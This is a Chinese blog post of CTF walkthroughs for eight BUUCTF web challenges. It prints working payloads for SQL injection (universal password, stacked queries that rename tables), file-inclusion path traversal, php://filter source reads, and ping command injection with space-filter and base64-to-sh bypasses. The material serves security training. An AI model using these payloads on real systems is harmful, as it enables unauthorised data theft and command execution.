BUU Web wp[1-8]

最新推荐文章于 2024-05-17 15:15:42 发布
最新推荐文章于 2024-05-17 15:15:42 发布
阅读量149 收藏
点赞数
分类专栏: BUU Web 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41513009/article/details/127013180
版权

BUU Web方向题解 1-8

[极客大挑战 2019]EasySQL

解题思路

万能密码
万能密码爆破

总结

万能密码1' or '1'='1

[HCTF 2018]WarmUp

解题思路

界面
F12查看源码
F12查看source.php

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

根据源码查看hint.php
hint.php审计代码,任意文件包含漏洞,但是有过滤,目录深度多尝试几次,有两种方式绕过:
在第三个if绕过检查:source.php?../../../../../ffffllllaaaagggg
在第四个if绕过检查:source.php%3f../../../../../ffffllllaaaagggg

总结

[极客大挑战 2019]Havefun

解题思路

F12

<?php
        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';
        };
?>

GET参数?cat=dog
cat=dog

总结

[ACTF2020 新生赛]Include

解题思路

tips
tips参数变为file=flag.php,猜想是文件包含,但是flag输出应该被注释掉了,因此
?file=php://filter/read=convert.base64-encode/resource=flag.php
php://filter解码得到flag

总结

利用filter协议读文件,通过base64编码后进行输出。这样做的好处就是如果不进行编码,文件包含后就不会有输出结果,而是当做php文件执行了,而通过编码后则可以读取文件源码。

[ACTF2020 新生赛]Exec

解题思路

明显的命令执行漏洞
ping command execpayload:127.0.0.1;cat /flag
命令执行漏洞

总结

利用;将命令截断,接着可以执行自定义的命令

[强网杯 2019]随便注

解题思路

堆叠注入
1';show databases;#
databases
查看表
1';use supersqli;show tables;#
tables
尝试查看表"1919810931114514",发现被过滤
1’;select * from 1919810931114514;#注意字符串做表名加`

select被过滤
此时有两种思路:

  • 绕过select过滤
    • handler

    1’;HANDLER `1919810931114514` OPEN;HANDLER `1919810931114514` READ FIRST;HANDLER `1919810931114514` CLOSE;#

    • prepare stmt

    SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

  • 利用已知回显
    对照输出和words表内容,发现输出是从words表中选出
    因此我们的思路就是把flag所在表的内容替换到words表
    words table
    #分段是为了理解
   1';
   rename table `words` to `words1`;
   rename table `1919810931114514` to `words`;
   alter table `words` change `flag` `id` 
   varchar(100) character set utf8 collate utf8_general_ci not NULL;#

这几种方式都能得到flag
flag

总结

  • 绕过select过滤
    • handler
    • prepare stmt
  • 替换表内容,利用已知回显输出
  • 常规注入不行的情况下尝试堆叠注入,尤其是输出格式符合var_dump的

[SUCTF 2019]EasySQL

解题思路

easysql1输入非0数字回显1,输入0回显0,可以判断为select query||string from Flag;
表名堆叠注入可得到

这样输入*,1,组成的sql语句为select *,1||flag from Flag;
但是这道题,||就算输入了真正的flag,也不会出现答案,没有什么实际意义,为了出题而出题罢了
输入正确flag另一个解是把||转化成concat:
1;set sql_mode=pipes_as_concat;select 1

总结

数字和字符串或,会把字符串强制转化为整数,提取开头到第一个非数字为字符串转化的值

select 0||'111aaaa2222'; #输出1
select 1||'aaaa'; #输出0

[GXYCTF2019]Ping Ping Ping

解题思路

很明显是命令执行,但是过滤很多
?ippayload:?ip=127.0.0.1;cat$IFS$9index.php
index.php可以看到引号、括号、空格和正反斜杠都被过滤了,因此替代空格的方式剩下有:

$IFS
$IFS$9

flag也被过滤,变量拼接
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php
得到flag
flag
也可以用编码绕过
?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

总结

绕过姿势可见CTF WEB总结

Silver Bullet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apachecn#apachecn-ctf-wiki#[WPBUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
BUU Web wp[9-16]
qq_41513009的博客
09-25 250
BUU Web wp[9-16]
BUU web wp2
qq_74825121的博客
02-21 1309
web题解
BUU-N1BOOK-Web
楼阁de猫的博客
12-11 966
web入门[第一章 web入门]常见的信息搜集[第一章 web入门]粗心的小李 [第一章 web入门]常见的信息搜集 考查知识点: 1.常规文件:robots.txt 2.gedit备份文件 3.vim备份文件 首先看robots.txt: 访问一下这个文件得到flag1 再看一下原始文件ihdex.php,发现什么都没有,之前用dirsearch扫了很多东西出来,试了/.git发现也不对,这里就看到书上讲到了gedit备份文件,它是以 ~ 为后缀的,试试index.php~,有东西了,拿到flag
buu web部分wp
qq_63267612的博客
08-21 189
上传文件,然后截取内容,从第六位开始的内容都会赋给data,然后会有一个黑名单一样的东西,如果data中存在黑名单字符,就会die。进入admin.php页面,使用admin 12345成功登录,发现可以进行网页编辑,但是需要权限。没得到flag,查看其它wp知道环境有点问题,flag不在这里,但是可以使用env来得到flag。fuzz之后,数字及英文字母都被过滤了。打开题目,要进行getshell。发现需要使用文章中第二种的方式。直接上传一个php文件。在微信这里存在目录穿越。编辑代码,拿到flag。
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 3808
BUUCTF--Web篇详细wp
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
如何同步管理1000个设备的VLAN数据?
weixin_68261415的博客
05-15 733
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
php centos选择sqlserver的驱动和扩展选择版本的说明
Z.X的博客
05-14 444
2023年2月23日13:41:48首先是php php扩展 驱动 数据库的关系 官方文档说明: https://learn.microsoft.com/zh-cn/sql/connect/php/step-1-configure-development-environment-for-php-development?view=sql-server-2017https://learn.microsoft.com/zh-cn/sql/connect/php/system-requirements-for-th
FebHost:为什么企业需要注册保加利亚.BG域名?
05-16 375
品牌本土化战略的实施同样离不开.BG域名的助力。拥有.BG域名的企业可以显著提高其在来自保加利亚的搜索请求中的可见度和排名,吸引更多的目标访问者,提升用户参与度。在当今全球化的商业环境中,对于与保加利亚市场息息相关的企业而言,选择合适的域名至关重要。面对日益饱和的通用顶级域名市场,.BG提供了一个具有区域特色的替代选择,帮助企业在保加利亚市场中树立一个鲜明且难忘的网络形象。综上所述,对于志在保加利亚市场塑造坚实网络地位的企业、组织或个人而言,.BG域名是一个明智且具有战略意义的选择,值得业界关注和利用。
等保测评实体分享three
ddcajdkdl的博客
05-16 925
它除了检测自身的主机以外,根本不检测网络上的情况,而且对入侵行为分析的工作量将随着主机数量的增加而增加,因此全面部署主机入侵检测系统代价比较大,企业很难将所有主机用主机入侵检测系统保护,只能选择部分主机进行保护,那些未安装主机入侵检测系统的机器将成为保护的盲点,入侵者可利用这些机器达到攻击的目标。NIDS一般部署在比较重要的网段内,它不需要改变服务器等主机的配置,由于它不会在业务系统的主机中安装额外的软件,从而不会影响这些机器的CPU、I/O与磁盘等资源的使用,不会影响业务系统的性能。
春秋云境CVE-2022-25487
2303_76653367的博客
05-15 310
Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。
Laravel中使用MinIO进行文件操作及ZIP解压
我码玄黄的博客
05-14 351
在本指南中,我们将详细介绍如何在laravel框架中操作minio,包含方法有:桶列表,创建桶,修改桶,上传文件,删除文件,生成直传链接,解压zip的php脚本
春秋云境CVE-2023-50564
最新发布
2303_76653367的博客
05-17 439
Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。
PHP 自提时间
qq_51110402的博客
05-14 257
【代码】PHP 自提时间。
[muduo网络库]——muduo库Thread类(剖析muduo网络库核心部分、设计思想)
m0_73537205的博客
05-14 329
muduo 是由陈硕大佬个人开发的 TCP 网络库,本专栏使用c++11重构了Muduo库中核心的Multi-Reactor架构,剖析大佬核心的代码设计思想,希望能够理清自己的思路,也希望能够帮助到大家。
buu ctf web进阶]ssti
08-23
common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值